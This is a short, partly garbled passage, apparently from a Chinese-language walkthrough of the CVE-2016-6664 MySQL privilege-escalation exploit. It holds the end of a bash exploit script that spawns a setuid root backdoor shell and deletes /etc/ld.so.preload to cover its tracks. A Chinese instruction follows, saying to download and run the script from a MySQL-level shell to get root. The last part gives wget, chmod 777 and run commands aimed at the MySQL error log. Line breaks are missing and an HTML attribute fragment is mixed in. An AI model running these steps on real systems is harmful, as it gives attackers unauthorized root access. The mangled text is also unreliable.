root"cleanexit 2fi# Execute the rootshellecho -e "/n[+] Spawning the rootshell $BACKDOORPATH now! /n"$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"$BACKDOORPATH -p# Job done.cleanexit 0" style="margin: auto" />在剛才mysql權(quán)限的shell中下載提權(quán)腳本并執(zhí)行，即可得到root權(quán)限

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.shchmod 777 mysql-chowned.sh./mysql-chowned.sh /var/log/mysql/error.log